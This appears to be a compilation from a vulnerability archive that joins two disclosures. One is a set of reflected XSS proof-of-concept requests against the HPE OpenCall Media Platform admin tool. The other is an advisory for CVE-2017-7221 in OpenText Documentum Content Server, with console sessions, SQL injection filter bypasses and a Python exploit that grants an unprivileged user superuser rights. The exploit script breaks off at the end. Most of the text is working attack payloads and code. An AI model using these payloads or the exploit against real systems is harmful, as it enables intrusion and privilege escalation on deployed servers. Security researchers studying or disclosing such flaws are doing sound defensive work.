Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32"><script>alert(1)<%2fscript>54a0f
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802″><script>alert(1)<
%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802"><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e”><script>alert(1)<
%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e"><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f”><script>alert(1)<
%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f"><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8″><script>alert(1)<
%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8"><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – GetMapAction function
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a”><script>alert(1)<
%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a"><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NUM parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NUM input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d”><script>alert(1)<
%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d"><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – NAME parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter NAME input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0″><script>alert(1)<
%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0"><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter next input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: GET
/OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<
%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter sessionType input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=25ed6″><script>alert(1)<
%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?sessionType=25ed6"><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
CVE’s
CVE-2017-5799 – Remote Code Execution
CVE-2017-5798 – Reflected Cross-Site Scripting (XSS)
'''
CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44
Description:
all versions of Documentum Content Server contain dm_bp_transition docbase
method ("stored procedure”) which is written on basic, implementation of this docbase
methods does not properly validate user input which allows attacker to execute arbitrary
code with superuser privileges.
Related code snippet is:
==========================================8<========================================
'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
If (debug = True) Then
PrintToLog sess, "Run user defined entry criteria."
End If
'
' researcher comment:
' userEntryID parameter is controlled by attacker
'
result = RunProcedure(userEntryID, 1, sess, sysID,_
user_name, targetState)
End If
...
'
' researcher comment:
' procID parameter is controlled by attacker
'
Function RunProcedure(procID As String, procNo As Integer,_
sessID As String, objID As String, userName As String,_
targetState As String) As Boolean
...
StartIt:
If (procID <> "0000000000000000") Then
result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
'
' researcher comment:
' here basic interpreter loads content of user-provided script
' from underlying repostiory using following technique:
'
' checking that it is dealing with dm_procedure object
' (check was introduced in CVE-2014-2513):
' id,c,dm_procedure where r_object_id='procID'
'
' getting content of basic script
' fetch,c,procID
' getpath,c,l
'
result = external(procID)
If (result = True) Then
If (procNo = 1) Then
' --- Running user-defined entry criteria ---
result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
On Error Goto NoFunction
'
' researcher comment
' here dmbasic interpreter executes user defined function
'
result = EntryCriteria(sessID, objID, userName,_
targetState, errorStack)
If (result = False) Then
errorStack = "[ErrorCode] 1500 [ServerError] " + _
errorStack
End If
==========================================>8========================================
So, attacker is able to create it’s own basic procedure in repository and pass it’s identifier
as argument for dm_bp_transition procedure:
==========================================8<========================================
$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."
Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability
==========================================>8========================================
Vendor was been notified about this vulnerability on November 2013 using customer
support channel, after a while vendor started claiming that this vulnerability
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability, the PoC provided
to CERT/CC was:
==========================================8<========================================
Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."
Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."
BUT:
API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)
....
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
==========================================>8========================================
On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.
On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor
constantly fails to provide status of reported vulnerabilities) by providing another proof of concept,
description provided to CERT/CC was:
==========================================8<========================================
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
error:
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"
Such behaviour means that EMC tried to remediate a security issue by
"checking" object type of supplied object:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"
API> Bye
bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$
So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:
~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory
~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
...
(1 row affected)
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
Here "union ..." allows to bypass check based on "id" call:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union
select r_object_id from dm_sysobject where
r_object_id='0801fd08805c9dfe'
...
0801fd08805c9dfe
API> apply,c,,GET_LAST_SQL
...
q0
API> next,c,q0
...
OK
API> get,c,q0,result
...
select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where
((dm_procedure.r_object_id='0801fd08805c9dfe,')) and
(dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0)
union select all dm_sysobject.r_object_id from dm_sysobject_sp
dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe'))
and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0)
API> close,c,q0
...
OK
Comma is required to bypass error in fetch call:
API> fetch,c,0801fd08805c9dfe' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
[DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union
select r_object_id from dm_sysobject where r_object_id=
'0801fd08805c9dfe"
API> fetch,c,0801fd08805c9dfe,' union select r_object_id from
dm_sysobject where r_object_id='0801fd08805c9dfe
...
OK
==========================================>8========================================
On August 2015 vendor had undertaken another attempt to remediate this vulnerability
check ESA-2015-131/CVE-2015-4533 for details.
On August 2015 the fix was contested, check http://seclists.org/bugtraq/2015/Aug/110
for detailed description - I just demonstrated another attack vector - using
UNION ALL keyword instead of UNION:
=================================8<================================
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
[DM_METHOD_E_METHOD_ARGS_INVALID]error:
"The arguments being passed to the method 'dm_bp_transition' are
invalid:
arguments contain sql keywords which are not allowed."
New attack vector (note ALL keyword):
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
=================================>8================================
Recently I have noticed that latest versions of Documentum Content
Server are not affected by the PoC provided above, however all versions
of Documentum Content Server are still vulnerable because vendor incorrectly
implemented input validation: they convert arguments to lower/upper-case,
replace line feed, carriage return and tab characters by a space,
remove double spaces, after that they check where resulting string contains
special keywords ('union ' and 'union all') or not - it is possible
to use other whitespace characters like backspace, which is demonstrated
in the PoC.
__
Regards,
Andrey B. Panfilov
CVE-2017-7221.py
'''
#!/usr/bin/env python
import socket
import sys
from os.path import basename
from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject
CIPHERS = "ALL:aNULL:!eNULL"
def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])
def main():
if len(sys.argv) != 5:
usage()
exit(1)
(session, docbase) = create_session(*sys.argv[1:5])
if is_super_user(session):
print "Current user is a superuser, nothing to do"
exit(1)
install_owner = session.serverconfig['r_install_owner']
document_id = session.next_id(0x08)
content_id = session.next_id(0x06)
store = session.get_by_qualification("dm_store")
format = session.get_by_qualification("dm_format where name='crtext'")
handle = session.make_pusher(store['r_object_id'])
if handle < 1:
print "Unable to create pusher"
exit(1)
data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
"\nByVal ObjectId As String,_" \
"\nByVal UserName As String,_" \
"\nByVal TargetState As String,_" \
"\nByRef ErrorString As String) As Boolean" \
"\nDim QueryID As String" \
"\nDim Query As String" \
"\nQuery = \"query,c,update dm_user objects set " \
"user_privileges=16 where user_name=\'%s\'\"" \
"\nQueryID = dmAPIGet(Query)" \
"\nQueryID = dmAPIExec(\"commit,c\")" \
"\nEntryCriteria=True" \
"\nEnd Function" % (sys.argv[3])
b = bytearray()
b.extend(data)
if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
print "Failed to start push"
exit(1)
session.upload(handle, b)
data_ticket = session.end_push_v2(handle)['DATA_TICKET']
procedure = False
try:
print "Trying to create dm_procedure"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_procedure")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2014-2513")
document.set_string("r_object_type", "dm_procedure")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if session.sys_obj_save(document_id, document):
procedure = True
except Exception, e:
print str(e)
if not procedure:
print "Failed to create dm_procedure"
print "Trying to create dm_sysobject"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_sysobject")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_string("owner_name", sys.argv[3])
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2017-7221")
document.set_string("r_object_type", "dm_sysobject")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if not session.sys_obj_save(document_id, document):
print "Failed to create dm_sysobject"
exit(1)
content = TypedObject(session=session)
content.set_string("OBJECT_TYPE", "dmr_content")
content.set_bool("IS_NEW_OBJECT", True)
content.set_id("storage_id", store['r_object_id'])
content.set_id("format", format['r_object_id'])
content.set_int("data_ticket", data_ticket)
content.set_id("parent_id", document_id)
content.set_int("page", 0)
content.set_string("full_format", format['name'])
content.set_int("content_size", len(b))
if not session.save_cont_attrs(content_id, content):
print "Failed to create content"
exit(1)
if procedure:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
install_owner, session.session)
else:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s,'' " \
"union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
document_id, install_owner, session.session)
session.query(query)
r = session.query(
"select user_privileges from dm_user "
"where user_name=USER") \
.next_record()['user_privileges']
if r != 16:
print "Failed"
exit(1)
print "P0wned!"
def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
try:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity)
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
identity=identity,
secure=True, ciphers=CIPHERS)
else:
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)
def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True
